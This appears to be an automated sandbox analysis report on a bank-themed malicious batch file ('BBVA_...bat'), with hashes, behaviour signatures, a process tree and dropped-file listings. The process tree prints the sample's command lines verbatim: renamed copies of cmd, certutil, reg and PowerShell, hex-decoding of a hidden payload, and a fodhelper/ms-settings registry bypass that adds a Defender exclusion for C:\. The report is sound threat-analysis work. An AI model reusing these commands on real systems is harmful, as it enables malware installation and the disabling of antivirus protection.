Analysis
-
max time kernel
141s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
06-06-2024 15:27
Static task
static1
Behavioral task
behavioral1
Sample
BBVA_74008300085000288003.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
BBVA_74008300085000288003.bat
Resource
win10v2004-20240426-en
General
-
Target
BBVA_74008300085000288003.bat
-
Size
3.0MB
-
MD5
17c7045b36fae5916e2900899e40fcdc
-
SHA1
793de1034b8dbce1547b85d7348324e8fb5d0106
-
SHA256
1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df
-
SHA512
f4be2aa7efaad65542147360369292774d242c0cc8ab6489036f601b9e914642a3183d0a2b0130d216e2b40baaebf368395cf755a5680999c2e83cfcdf899e46
-
SSDEEP
49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4K3:x
Malware Config
Signatures
-
Executes dropped EXE 24 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 1724 alpha.exe 2272 alpha.exe 2320 alpha.exe 1584 alpha.exe 2152 kn.exe 1772 alpha.exe 2984 alpha.exe 2564 alpha.exe 2556 alpha.exe 2804 xkn.exe 2524 alpha.exe 2388 ger.exe 2500 alpha.exe 2532 kn.exe 2936 alpha.exe 2256 Ping_c.pif 2040 alpha.exe 556 alpha.exe 1868 alpha.exe 1864 alpha.exe 2592 alpha.exe 2588 alpha.exe 2716 alpha.exe 2624 alpha.exe -
Loads dropped DLL 18 IoCs
Processes:
cmd.exealpha.exealpha.exexkn.exealpha.exealpha.exeWerFault.exepid process 2156 cmd.exe 2156 cmd.exe 2156 cmd.exe 2156 cmd.exe 1584 alpha.exe 2156 cmd.exe 2156 cmd.exe 2156 cmd.exe 2156 cmd.exe 2556 alpha.exe 2804 xkn.exe 2804 xkn.exe 2804 xkn.exe 2524 alpha.exe 2156 cmd.exe 2500 alpha.exe 1944 WerFault.exe 1944 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1944 2256 WerFault.exe Ping_c.pif -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1060 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Ping_c.pifpid process 2256 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
xkn.exepid process 2804 xkn.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2804 xkn.exe Token: SeDebugPrivilege 1060 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2156 wrote to memory of 300 2156 cmd.exe extrac32.exe PID 2156 wrote to memory of 300 2156 cmd.exe extrac32.exe PID 2156 wrote to memory of 300 2156 cmd.exe extrac32.exe PID 2156 wrote to memory of 1724 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 1724 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 1724 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2272 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2272 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2272 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2320 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2320 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2320 2156 cmd.exe alpha.exe PID 2320 wrote to memory of 2444 2320 alpha.exe extrac32.exe PID 2320 wrote to memory of 2444 2320 alpha.exe extrac32.exe PID 2320 wrote to memory of 2444 2320 alpha.exe extrac32.exe PID 2156 wrote to memory of 1584 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 1584 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 1584 2156 cmd.exe alpha.exe PID 1584 wrote to memory of 2152 1584 alpha.exe kn.exe PID 1584 wrote to memory of 2152 1584 alpha.exe kn.exe PID 1584 wrote to memory of 2152 1584 alpha.exe kn.exe PID 2156 wrote to memory of 1772 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 1772 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 1772 2156 cmd.exe alpha.exe PID 1772 wrote to memory of 2988 1772 alpha.exe extrac32.exe PID 1772 wrote to memory of 2988 1772 alpha.exe extrac32.exe PID 1772 wrote to memory of 2988 1772 alpha.exe extrac32.exe PID 2156 wrote to memory of 2984 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2984 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2984 2156 cmd.exe alpha.exe PID 2984 wrote to memory of 2512 2984 alpha.exe extrac32.exe PID 2984 wrote to memory of 2512 2984 alpha.exe extrac32.exe PID 2984 wrote to memory of 2512 2984 alpha.exe extrac32.exe PID 2156 wrote to memory of 2564 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2564 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2564 2156 cmd.exe alpha.exe PID 2564 wrote to memory of 2640 2564 alpha.exe extrac32.exe PID 2564 wrote to memory of 2640 2564 alpha.exe extrac32.exe PID 2564 wrote to memory of 2640 2564 alpha.exe extrac32.exe PID 2156 wrote to memory of 2556 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2556 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2556 2156 cmd.exe alpha.exe PID 2556 wrote to memory of 2804 2556 alpha.exe xkn.exe PID 2556 wrote to memory of 2804 2556 alpha.exe xkn.exe PID 2556 wrote to memory of 2804 2556 alpha.exe xkn.exe PID 2804 wrote to memory of 2524 2804 xkn.exe alpha.exe PID 2804 wrote to memory of 2524 2804 xkn.exe alpha.exe PID 2804 wrote to memory of 2524 2804 xkn.exe alpha.exe PID 2524 wrote to memory of 2388 2524 alpha.exe ger.exe PID 2524 wrote to memory of 2388 2524 alpha.exe ger.exe PID 2524 wrote to memory of 2388 2524 alpha.exe ger.exe PID 2156 wrote to memory of 2500 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2500 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2500 2156 cmd.exe alpha.exe PID 2500 wrote to memory of 2532 2500 alpha.exe kn.exe PID 2500 wrote to memory of 2532 2500 alpha.exe kn.exe PID 2500 wrote to memory of 2532 2500 alpha.exe kn.exe PID 2156 wrote to memory of 2936 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2936 2156 cmd.exe alpha.exe PID 2156 wrote to memory of 2936 2156 cmd.exe alpha.exe PID 2936 wrote to memory of 1060 2936 alpha.exe taskkill.exe PID 2936 wrote to memory of 1060 2936 alpha.exe taskkill.exe PID 2936 wrote to memory of 1060 2936 alpha.exe taskkill.exe PID 2156 wrote to memory of 2256 2156 cmd.exe Ping_c.pif
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 7803⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.1MB
MD5962c746f045885ca2883fec129a5bb98
SHA1bdad34f489b6a8b3a3101d658ea426805e859473
SHA2568b5cbf4eba7ce848616eda92a3eaea0372a7a97efba05ce2ebfac5c99c243e71
SHA51245cd944310a28216835eea924cd03c668b948ccab63a7b6489453a69bf6a7f160d105e9879096580d571e7af1ab4deea02ec506f57f48e370b8c5918c44cdb83
-
C:\Users\Public\Ping_c.mp4Filesize
2.2MB
MD518fbc4b3cab1f954789cf7649dcd1dff
SHA1661ba52bd44e913cd74b214e1652843f1f894e1c
SHA2564bb6bb0afbf65b0bdf0d5f0963c1133f3a0d049557d485d185e1e65b5b84987a
SHA512de11b7621e1170f0f6d0efa75d2b75456a5b3d677d865ab07ad157b1e7ad7eec175404500e92806e7c20085512b82ad2db2c0eb83377baacd24d0500b5e501c3
-
C:\Users\Public\alpha.exeFilesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
C:\Users\Public\ger.exeFilesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
C:\Users\Public\kn.exeFilesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
C:\Users\Public\xkn.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/2256-72-0x0000000000400000-0x0000000000522000-memory.dmpFilesize
1.1MB
-
memory/2804-44-0x0000000001DA0000-0x0000000001DA8000-memory.dmpFilesize
32KB
-
memory/2804-43-0x000000001B4B0000-0x000000001B792000-memory.dmpFilesize
2.9MB